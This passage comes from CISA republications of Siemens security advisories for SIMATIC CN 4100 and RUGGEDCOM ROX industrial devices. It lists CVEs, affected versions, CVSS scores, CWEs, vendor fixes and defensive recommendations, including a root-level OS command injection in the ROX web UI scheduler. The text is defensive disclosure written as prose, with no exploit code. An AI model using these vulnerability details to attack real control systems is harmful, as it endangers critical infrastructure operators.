(CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-284 Improper Access Control Metrics CVSS Version Base Score Base Severity Vector String 3.1 3.7 LOW CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N CVE-2025-61795 Improper Resource Shutdown or Release vulnerability in Apache Tomcat. If an error occurred (including exceeding limits) during the processing of a multipart upload, temporary copies of the uploaded parts written to disc were not cleaned up immediately but left for the garbage collection process to delete. Depending on JVM settings, application memory usage and application load, it was possible that space for the temporary copies of uploaded parts would be filled faster than GC cleared it, leading to a DoS. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.11, from 10.1.0-M1 through 10.1.46, from 9.0.0.M1 through 9.0.109. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.12 or later, 10.1.47 or later or 9.0.110 or later which fixes the issue. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-404 Improper Resource Shutdown or Release Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2026-2673 Issue summary: An OpenSSL TLS 1.3 server may fail to negotiate the expected preferred key exchange group when its key exchange group configuration includes the default by using the 'DEFAULT' keyword. 
Impact summary: A less preferred key exchange may be used even when a more preferred group is supported by both client and server, if the group was not included among the client's initial predicated keyshares. This will sometimes be the case with the new hybrid post-quantum groups, if the client chooses to defer their use until specifically requested by the server. If an OpenSSL TLS 1.3 server's configuration uses the 'DEFAULT' keyword to interpolate the built-in default group list into its own configuration, perhaps adding or removing specific elements, then an implementation defect causes the 'DEFAULT' list to lose its 'tuple' structure, and all server-supported groups were treated as a single sufficiently secure 'tuple', with the server not sending a Hello Retry Request (HRR) even when a group in a more preferred tuple was mutually supported. As a result, the client and server might fail to negotiate a mutually supported post-quantum key agreement group, such as 'X25519MLKEM768', if the client's configuration results in only 'classical' groups (such as 'X25519' being the only ones in the client's initial keyshare prediction). OpenSSL 3.5 and later support a new syntax for selecting the most preferred TLS 1.3 key agreement group on TLS servers. The old syntax had a single 'flat' list of groups, and treated all the supported groups as sufficiently secure. If any of the keyshares predicted by the client were supported by the server the most preferred among these was selected, even if other groups supported by the client, but not included in the list of predicted keyshares would have been more preferred, if included. The new syntax partitions the groups into distinct 'tuples' of roughly equivalent security. 
Within each tuple the most preferred group included among the client's predicted keyshares is chosen, but if the client supports a group from a more preferred tuple, but did not predict any corresponding keyshares, the server will ask the client to retry the ClientHello (by issuing a Hello Retry Request or HRR) with the most preferred mutually supported group. The above works as expected when the server's configuration uses the built-in default group list, or explicitly defines its own list by directly defining the various desired groups and group 'tuples'. No OpenSSL FIPS modules are affected by this issue, the code in question lies outside the FIPS boundary. OpenSSL 3.6 and 3.5 are vulnerable to this issue. OpenSSL 3.6 users should upgrade to OpenSSL 3.6.2 once it is released. OpenSSL 3.5 users should upgrade to OpenSSL 3.5.6 once it is released. OpenSSL 3.4, 3.3, 3.0, 1.0.2 and 1.1.1 are not affected by this issue. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-757 Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade') Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVE-2026-21925 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: RMI). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. 
Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N CVE-2026-21932 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: AWT, JavaFX). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. 
Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.4 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.4 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N CVE-2026-21933 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Networking). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. 
Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CVE-2026-21945 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. 
Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-400 Uncontrolled Resource Consumption Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-21947 Vulnerability in Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u471-b50. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE accessible data. 
Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Metrics CVSS Version Base Score Base Severity Vector String 3.1 3.1 LOW CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N CVE-2026-22924 The affected application does not properly restrict unauthenticated connections and is susceptible to resource exhaustion conditions. This could allow an attacker to disrupt normal operations or perform unauthorized actions, potentially impacting system availability and integrity. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H CVE-2026-22925 The affected application is susceptible to resource exhaustion when subjected to high volume of TCP SYN packets This could allow an attacker to render the service unavailable and cause denial-of-service conditions by overwhelming system resources. 
View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-770 Allocation of Resources Without Limits or Throttling Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-28387 Issue summary: An uncommon configuration of clients performing DANE TLSA-based server authentication, when paired with uncommon server DANE TLSA records, may result in a use-after-free and/or double-free on the client side. Impact summary: A use after free can have a range of potential consequences such as the corruption of valid data, crashes or execution of arbitrary code. However, the issue only affects clients that make use of TLSA records with both the PKIX-TA(0/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate usage. By far the most common deployment of DANE is in SMTP MTAs for which RFC7672 recommends that clients treat as 'unusable' any TLSA records that have the PKIX certificate usages. These SMTP (or other similar) clients are not vulnerable to this issue. Conversely, any clients that support only the PKIX usages, and ignore the DANE-TA(2) usage are also not vulnerable. The client would also need to be communicating with a server that publishes a TLSA RRset with both types of TLSA records. No FIPS modules are affected by this issue, the problem code is outside the FIPS module boundary. 
View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H CVE-2026-28388 Issue summary: When a delta CRL that contains a Delta CRL Indicator extension is processed a NULL pointer dereference might happen if the required CRL Number extension is missing. Impact summary: A NULL pointer dereference can trigger a crash which leads to a Denial of Service for an application. When CRL processing and delta CRL processing is enabled during X.509 certificate verification, the delta CRL processing does not check whether the CRL Number extension is NULL before dereferencing it. When a malformed delta CRL file is being processed, this parameter can be NULL, causing a NULL pointer dereference. Exploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in the verification context, the certificate being verified to contain a freshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and an attacker to provide a malformed CRL to an application that processes it. The vulnerability is limited to Denial of Service and cannot be escalated to achieve code execution or memory disclosure. For that reason the issue was assessed as Low severity according to our Security Policy. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. 
View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-28389 Issue summary: During processing of a crafted CMS EnvelopedData message with KeyAgreeRecipientInfo a NULL pointer dereference can happen. Impact summary: Applications that process attacker-controlled CMS data may crash before authentication or cryptographic operations occur resulting in Denial of Service. When a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is processed, the optional parameters field of KeyEncryptionAlgorithmIdentifier is examined without checking for its presence. This results in a NULL pointer dereference if the field is missing. Applications and services that call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) are vulnerable. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-28390 Issue summary: During processing of a crafted CMS EnvelopedData message with KeyTransportRecipientInfo a NULL pointer dereference can happen. 
Impact summary: Applications that process attacker-controlled CMS data may crash before authentication or cryptographic operations occur resulting in Denial of Service. When a CMS EnvelopedData message that uses KeyTransportRecipientInfo with RSA-OAEP encryption is processed, the optional parameters field of RSA-OAEP SourceFunc algorithm identifier is examined without checking for its presence. This results in a NULL pointer dereference if the field is missing. Applications and services that call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) are vulnerable. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-31789 Issue summary: Converting an excessively large OCTET STRING value to a hexadecimal string leads to a heap buffer overflow on 32 bit platforms. Impact summary: A heap buffer overflow may lead to a crash or possibly an attacker controlled code execution or other undefined behavior. If an attacker can supply a crafted X.509 certificate with an excessively large OCTET STRING value in extensions such as the Subject Key Identifier (SKID) or Authority Key Identifier (AKID) which are being converted to hex, the size of the buffer needed for the result is calculated as multiplication of the input length by 3. On 32 bit platforms, this multiplication may overflow resulting in the allocation of a smaller buffer and a heap buffer overflow. 
Applications and services that print or log contents of untrusted X.509 certificates are vulnerable to this issue. As the certificates would have to have sizes of over 1 Gigabyte, printing or logging such certificates is a fairly unlikely operation and only 32 bit platforms are affected, this issue was assigned Low severity. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H CVE-2026-31790 Issue summary: Applications using RSASVE key encapsulation to establish a secret encryption key can send contents of an uninitialized memory buffer to a malicious peer. Impact summary: The uninitialized buffer might contain sensitive data from the previous execution of the application process which leads to sensitive data leakage to an attacker. RSA_public_encrypt() returns the number of bytes written on success and -1 on error. The affected code tests only whether the return value is non-zero. As a result, if RSA encryption fails, encapsulation can still return success to the caller, set the output lengths, and leave the caller to use the contents of the ciphertext buffer as if a valid KEM ciphertext had been produced. If applications use EVP_PKEY_encapsulate() with RSA/RSASVE on an attacker-supplied invalid RSA public key without first validating that key, then this may cause stale or uninitialized contents of the caller-provided ciphertext buffer to be disclosed to the attacker in place of the KEM ciphertext. 
As a workaround calling EVP_PKEY_public_check() or EVP_PKEY_public_check_quick() before EVP_PKEY_encapsulate() will mitigate the issue. The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.1 and 3.0 are affected by this issue. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-754 Improper Check for Unusual or Exceptional Conditions Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Acknowledgments Siemens ProductCERT reported these vulnerabilities to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. 
Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-032379 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. 
Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-032379 advisory Legal Notice and Terms of Use

Siemens Ruggedcom Rox

Summary
Ruggedcom Rox contains an input validation vulnerability in the Scheduler functionality that could allow an authenticated remote attacker to execute arbitrary commands with root privileges on the underlying operating system. Siemens has released new versions for the affected products and recommends updating to the latest versions.

The following versions of Siemens Ruggedcom Rox are affected (vers:intdot/<2.17.1, i.e. all versions before 2.17.1):
RUGGEDCOM ROX MX5000
RUGGEDCOM ROX MX5000RE
RUGGEDCOM ROX RX1400
RUGGEDCOM ROX RX1500
RUGGEDCOM ROX RX1501
RUGGEDCOM ROX RX1510
RUGGEDCOM ROX RX1511
RUGGEDCOM ROX RX1512
RUGGEDCOM ROX RX1524
RUGGEDCOM ROX RX1536
RUGGEDCOM ROX RX5000

CVSS v3: 9.1
Vendor: Siemens
Equipment: Siemens Ruggedcom Rox
Vulnerabilities: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities
CVE-2025-40949
Affected devices do not properly sanitize user-supplied input in the Scheduler functionality of the Web UI, allowing commands to be injected into the task scheduling backend. This could allow an authenticated remote attacker to execute arbitrary commands with root privileges on the underlying operating system.
Affected Products: Siemens Ruggedcom Rox (Vendor: Siemens). Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000. Product Status: known_affected.
Remediations: Vendor fix. Update to V2.17.1 or later version: https://support.industry.siemens.com/cs/ww/en/view/110002017/
Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Metrics
CVSS Version  Base Score  Base Severity  Vector String
3.1           9.1         CRITICAL       CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Acknowledgments
Emmanuel Zhou, Rick Wyble, Mehemt Balta, and Adam Robbie of Palo Alto Networks OT Threat Research Lab reported this vulnerability to Siemens. Siemens ProductCERT reported this vulnerability to CISA.

General Recommendations
As a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and following the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity

Additional Resources
For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories

Terms of Use
The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.
Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-081142 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-05-12
Date        Revision  Summary
2026-05-12  1         Publication Date
2026-05-14  2         Initial CISA Republication of Siemens ProductCERT SSA-081142 advisory

Siemens Ruggedcom Rox

Summary
Ruggedcom Rox before V2.17.1 contains multiple third-party vulnerabilities. Siemens has released new versions for the affected products and recommends updating to the latest versions.

The following versions of Siemens Ruggedcom Rox are affected (vers:intdot/<2.17.1, i.e. all versions before 2.17.1):
RUGGEDCOM ROX MX5000
RUGGEDCOM ROX MX5000RE
RUGGEDCOM ROX RX1400
RUGGEDCOM ROX RX1500
RUGGEDCOM ROX RX1501
RUGGEDCOM ROX RX1510
RUGGEDCOM ROX RX1511
RUGGEDCOM ROX RX1512
RUGGEDCOM ROX RX1524
RUGGEDCOM ROX RX1536
RUGGEDCOM ROX RX5000

Every product above is affected by the same set of CVEs:
CVE-2019-13103, CVE-2019-13104, CVE-2019-13106, CVE-2019-14192, CVE-2019-14193, CVE-2019-14194, CVE-2019-14195, CVE-2019-14196, CVE-2019-14197, CVE-2019-14198, CVE-2019-14199, CVE-2019-14200, CVE-2019-14201, CVE-2019-14202, CVE-2019-14203, CVE-2019-14204, CVE-2020-10648, CVE-2022-2347, CVE-2022-30552, CVE-2022-30790, CVE-2022-34835, CVE-2023-3019, CVE-2023-27043, CVE-2024-3447, CVE-2024-22365, CVE-2024-57256, CVE-2024-57258, CVE-2025-0395, CVE-2025-3576, CVE-2025-6020, CVE-2025-7425, CVE-2025-9714, CVE-2025-46836, CVE-2025-49794, CVE-2025-49796

CVSS v3: 9.8
Vendor: Siemens
Equipment: Siemens Ruggedcom Rox
Vulnerabilities: Uncontrolled Recursion, Integer Underflow (Wrap or Wraparound), Out-of-bounds Write, Out-of-bounds Read, Improper Input Validation, Heap-based Buffer Overflow, Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'), Use After Free, Improper Validation of Syntactic Correctness of Input, Improper Control of a Resource Through its Lifetime, Integer Overflow or Wraparound, Incorrect Calculation of Buffer Size, Use of Weak Hash, Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Stack-based Buffer Overflow, Expired Pointer Dereference

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities
CVE-2019-13103
A crafted self-referential DOS partition table will cause all Das U-Boot versions through 2019.07-rc4 to infinitely recurse, causing the stack to grow infinitely and eventually either crash or overwrite other data.
